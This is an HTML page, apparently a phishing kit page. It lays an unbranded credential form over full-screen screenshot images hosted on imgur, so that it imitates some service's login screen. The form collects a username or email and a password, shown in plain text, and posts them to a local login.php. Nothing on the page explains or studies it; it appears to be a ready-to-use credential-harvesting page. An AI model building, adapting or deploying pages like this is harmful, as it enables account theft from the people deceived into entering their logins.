<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Document</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:2px; width:1346px; height:638px; z-index:0"><img src="https://i.imgur.com/uYuVpEG.jpg" alt="" title="" border=0 width=1346 height=638></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:650px; width:1353px; height:31px; z-index:1"><img src="https://i.imgur.com/rX0Oup1.jpg" alt="" title="" border=0 width=1353 height=31></div>

<form name="form1" method="post" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:304px;left:857px;top:229px;z-index:3;height: 46px;" required placeholder="Username or Email">
<div id="formcheckbox1" style="position:absolute; left:857px; top:461px; z-index:6"><input type="checkbox" name="formcheckbox1" value="on"></div>
<input name="formtext2" type="text" style="position:absolute;width:304px;left:857px;top:299px;z-index:7;height: 46px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:847px; top:375px; z-index:8"><input type="image" name="formimage1" width="336" height="60" src="https://i.imgur.com/9sj45fi.png"></div>
</form>

<div id="image3" style="position:absolute; overflow:hidden; left:856px; top:376px; width:315px; height:124px; z-index:4"><img src="https://i.imgur.com/jyfb2x0.jpg" alt="" title="" border=0 width=315 height=124></div>

<div id="image4" style="position:absolute; overflow:hidden; left:850px; top:296px; width:320px; height:59px; z-index:5"><img src="https://i.imgur.com/jyfb2x0.jpg" alt="" title="" border=0 width=320 height=59></div>


</body>
</html>
